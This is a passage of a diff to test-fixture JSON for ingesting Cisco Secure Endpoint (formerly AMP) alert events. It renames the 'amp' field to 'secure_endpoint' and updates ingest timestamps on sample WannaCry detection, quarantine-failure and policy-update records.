                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2875,7 +2875,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.24D004A104-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2937,7 +2937,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929529537Z",
+                "ingested": "2021-09-27T00:42:13.513726136Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2947,7 +2947,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3008,7 +3008,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929531441Z",
+                "ingested": "2021-09-27T00:42:13.513727878Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3018,7 +3018,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3104,7 +3104,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929533342Z",
+                "ingested": "2021-09-27T00:42:13.513729613Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3115,7 +3115,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3181,7 +3181,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:42.929535291Z",
+                "ingested": "2021-09-27T00:42:13.513731351Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T13:29:36.000Z",
@@ -3192,7 +3192,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3246,13 +3246,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:07:42.929537188Z",
+                "ingested": "2021-09-27T00:42:13.513733086Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6412574627503014000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3308,7 +3308,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929539100Z",
+                "ingested": "2021-09-27T00:42:13.513734850Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3318,7 +3318,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3395,7 +3395,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929540993Z",
+                "ingested": "2021-09-27T00:42:13.513736591Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3406,7 +3406,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3480,7 +3480,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929542884Z",
+                "ingested": "2021-09-27T00:42:13.513738332Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3491,7 +3491,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3553,7 +3553,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929544781Z",
+                "ingested": "2021-09-27T00:42:13.513740071Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3563,7 +3563,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3628,7 +3628,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929546661Z",
+                "ingested": "2021-09-27T00:42:13.513741811Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3638,7 +3638,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3703,7 +3703,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929548553Z",
+                "ingested": "2021-09-27T00:42:13.513743552Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3713,7 +3713,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3778,7 +3778,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929550429Z",
+                "ingested": "2021-09-27T00:42:13.513745300Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3788,7 +3788,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3853,7 +3853,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929552332Z",
+                "ingested": "2021-09-27T00:42:13.513747019Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3863,7 +3863,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3951,7 +3951,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929554208Z",
+                "ingested": "2021-09-27T00:42:13.513748750Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3962,7 +3962,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -4040,7 +4040,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929556094Z",
+                "ingested": "2021-09-27T00:42:13.513750477Z",
